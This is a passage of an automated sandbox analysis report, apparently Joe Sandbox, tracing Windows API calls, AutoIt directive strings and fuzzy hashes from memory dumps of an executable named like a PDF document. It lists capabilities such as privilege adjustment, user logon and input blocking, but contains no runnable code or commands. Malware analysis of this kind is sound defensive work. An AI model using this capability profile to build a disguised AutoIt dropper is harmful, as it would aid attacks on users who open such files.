                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
                                                            • CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00118F97,?,?,?,00000001), ref: 0011A39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0011A3A3
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            • __time64.LIBCMT ref: 00158B25
                                                              • Part of subcall function 0011543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001591F8,00000000,?,?,?,?,001593A9,00000000,?), ref: 00115443
                                                              • Part of subcall function 0011543A: __aulldiv.LIBCMT ref: 00115463
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00164218
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00154EEC
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001488D1), ref: 00148CB3
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00132242
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0011A36A
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00167B70
                                                            • DeleteObject.GDI32(00000000), ref: 00167B82
                                                            • DestroyWindow.USER32 ref: 00167B90
                                                            • GetDesktopWindow.USER32 ref: 00167BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00167BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00167CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00167D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00167D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00167D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00167E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167E15
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00182CAC,00000000), ref: 00167E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00167E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00167E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00167E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0016808F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0017F910), ref: 001738AF
                                                            • IsWindowVisible.USER32(?), ref: 001738D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0017A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0017A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0017A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0017A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0017A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0017A930
                                                            • GetSysColor.USER32(00000010), ref: 0017A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0017A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0017A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0017A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0017A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0017A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017A9FD
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(00000012), ref: 0017AB99
                                                              • Part of subcall function 0017AB60: SetTextColor.GDI32(?,?), ref: 0017AB9D
                                                              • Part of subcall function 0017AB60: GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(0000000F), ref: 0017ABBE
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(00000011), ref: 0017ABDB
                                                              • Part of subcall function 0017AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
                                                              • Part of subcall function 0017AB60: SelectObject.GDI32(?,00000000), ref: 0017ABFA
                                                              • Part of subcall function 0017AB60: SetBkColor.GDI32(?,00000000), ref: 0017AC03
                                                              • Part of subcall function 0017AB60: SelectObject.GDI32(?,?), ref: 0017AC10
                                                              • Part of subcall function 0017AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
                                                              • Part of subcall function 0017AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
                                                              • Part of subcall function 0017AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 001677F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001678B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001678EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00167900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00167946
                                                            • GetClientRect.USER32(00000000,?), ref: 00167952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00167996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001679A5
                                                            • GetStockObject.GDI32(00000011), ref: 001679B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001679B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001679C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001679D2
                                                            • DeleteDC.GDI32(00000000), ref: 001679DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00167A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00167A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00167A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00167A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00167A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00167AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00167AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00167AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00167ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015AF89
                                                            • GetDriveTypeW.KERNEL32(?,0017FAC0,?,\\.\,0017F910), ref: 0015B066
                                                            • SetErrorMode.KERNEL32(00000000,0017FAC0,?,\\.\,0017F910), ref: 0015B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: c1a3d281a99a308a4f1987c02b4f2f4c93b6331091487a95bded879dc14aadc2
                                                            • Instruction ID: 44b5938582f5b4e58bee2d9339075303a688b686ee5bdeec478733320e0f4bde
                                                            • Opcode Fuzzy Hash: c1a3d281a99a308a4f1987c02b4f2f4c93b6331091487a95bded879dc14aadc2
                                                            • Instruction Fuzzy Hash: 34812B70640219BBCB24AF20DD92FFF77A8AF25300F044035FE45AB582EB71DA95D6A1
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0017AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0017AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0017ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0017ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0017ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0017ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0017AC03
                                                            • SelectObject.GDI32(?,?), ref: 0017AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0017ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0017ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0017ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0017ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0017AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0017AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0017AD21
                                                            • SelectObject.GDI32(?,0017A869), ref: 0017AD38
                                                            • DeleteObject.GDI32(?), ref: 0017AD43
                                                            • SelectObject.GDI32(?,?), ref: 0017AD49
                                                            • DeleteObject.GDI32(?), ref: 0017AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0017AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0017AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 405fea79c343bf81ce6f6f04a2ba2d67354d849d073a1c80440a03195e30fa04
                                                            • Instruction ID: c012295681c16525f72cd3c01a10cec06762e40b3d5e0b2ca8009a321b793e68
                                                            • Opcode Fuzzy Hash: 405fea79c343bf81ce6f6f04a2ba2d67354d849d073a1c80440a03195e30fa04
                                                            • Instruction Fuzzy Hash: AB614D71900218FFDB119FA4DC48EAE7B79FF48320F118129F919AB2A1D7759D81DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00178D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178D45
                                                            • CharNextW.USER32(0000014E), ref: 00178D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00178DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00178DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00178DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00178E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00178E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00178E8C
                                                            • _memset.LIBCMT ref: 00178EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00178EFA
                                                            • _memset.LIBCMT ref: 00178F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00178F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00178FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00179088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 001790AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001790F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00179121
                                                            • DrawMenuBar.USER32(?), ref: 00179130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00179158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 0a137884f649879d6b99fd9b9e1d54a6c694ab1527c332bf93eccae373ea4867
                                                            • Instruction ID: d7e31ad4e385e60aa79bd59451a4e3ed3b840b4ad63a4b04ec850d00eeedc976
                                                            • Opcode Fuzzy Hash: 0a137884f649879d6b99fd9b9e1d54a6c694ab1527c332bf93eccae373ea4867
                                                            • Instruction Fuzzy Hash: 3CE16071940219ABDF21DF64CC88EEE7BB9FF15720F108159F91DAA290DB708A85DF60
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00174C51
                                                            • GetDesktopWindow.USER32 ref: 00174C66
                                                            • GetWindowRect.USER32(00000000), ref: 00174C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00174CCF
                                                            • DestroyWindow.USER32(?), ref: 00174CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00174D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00174D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00174D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00174D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00174D90
                                                            • IsWindowVisible.USER32(?), ref: 00174DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00174DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00174DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00174DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00174E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00174E37
                                                            • CopyRect.USER32(?,?), ref: 00174E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00174EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
                                                            • Instruction ID: 95018eb7d4eb05584dbd1eb9fda5a538af4f5efc8dead46074a0482a0a856d76
                                                            • Opcode Fuzzy Hash: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
                                                            • Instruction Fuzzy Hash: 07B14571608341AFDB04DF64C849B6ABBF4BB88710F00891DF5999B2A2DB75EC45CB92
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001546E8
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0015470E
                                                            • _wcscpy.LIBCMT ref: 0015473C
                                                            • _wcscmp.LIBCMT ref: 00154747
                                                            • _wcscat.LIBCMT ref: 0015475D
                                                            • _wcsstr.LIBCMT ref: 00154768
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00154784
                                                            • _wcscat.LIBCMT ref: 001547CD
                                                            • _wcscat.LIBCMT ref: 001547D4
                                                            • _wcsncpy.LIBCMT ref: 001547FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: b048cd2e01f41085ef3eb7b0b4d8d65212e37dd5ac41c7180cf68fa2409a907a
                                                            • Instruction ID: a9d1de3092cf0e28b611e2809f8bfa58f579008be6544df0bd45a610838e2440
                                                            • Opcode Fuzzy Hash: b048cd2e01f41085ef3eb7b0b4d8d65212e37dd5ac41c7180cf68fa2409a907a
                                                            • Instruction Fuzzy Hash: 2E411676A04201BBDB18A7748C43FFF777CDF16710F00407AF908E6182EB70999296A5
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 000F28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 000F28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 000F291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000F2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000F2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000F297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000F2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 000F29AE
                                                            • GetStockObject.GDI32(00000011), ref: 000F29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000F29D5
                                                              • Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
                                                              • Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,000F1256), ref: 000F29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 0be4270845ba5c52c0e8afdaa36f34f8c856967a51d6f7caa5373fea4ebf914f
                                                            • Instruction ID: d56d0b481c6b9a4c643f06fe8de436937c7bccebe73b7e26a20d5e1fd75ea4a3
                                                            • Opcode Fuzzy Hash: 0be4270845ba5c52c0e8afdaa36f34f8c856967a51d6f7caa5373fea4ebf914f
                                                            • Instruction Fuzzy Hash: D8B16C71A0020AEFDB14DFA8DC45BEE7BB5FB18310F108629FA15E7690DB749891DB90
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 001740F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001741B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
